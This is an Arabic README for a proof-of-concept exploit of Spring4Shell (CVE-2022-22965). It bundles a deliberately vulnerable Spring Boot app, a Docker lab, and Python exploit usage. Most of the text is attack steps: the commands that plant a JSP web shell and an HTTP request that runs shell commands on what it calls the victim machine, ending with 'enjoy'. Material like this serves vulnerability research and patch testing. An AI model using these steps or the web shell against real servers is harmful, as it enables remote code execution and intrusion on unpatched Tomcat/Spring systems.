
استغلال إثبات المفهوم لـ CVE-2022-22965 (Spring4Shell) مع تطبيق Spring Boot ضعيف ونص استغلال بايثون وبيئة مختبر قائمة على Docker للاختبار.
هذا إثبات مفهوم لاستغلال ثغرة CVE-2022-22965 (spring4shell). يتكون من:
يوجد داخل المجلد الجذر للمشروع ملف Dockerfile ينشئ صورة tomcat وينسخ ملفي vulnerable_app/target/spring4shell.war وsafe_app/target/safeapp.war إلى مجلد /usr/local/tomcat/webapps، لذلك كل ما عليك فعله هو بناء الصورة وتشغيل الحاوية.
docker build -t cve_2022_22965 .
docker run -p 8080:8080 -d --name springshell cve_2022_22965
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson
إذا رأيت هذه الاستجابة
This is Elliot Alderson
فإن التطبيق يعمل بنجاح.
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit
يمكنك اختياريًا تحديد اسم ملف jsp المُحقن، لكنه ليس إلزاميًا. مثال
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp
إذا لم تحدد اسمًا، فسيتم إنشاء اسم عشوائي.
سترى ما يلي في سطر الأوامر

بعد تنفيذ الاستغلال، يمكنك أيضًا إرسال أمر عبر طلب HTTP GET
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls
لقد نجحت في فتح شل على جهاز الضحية! استمتع.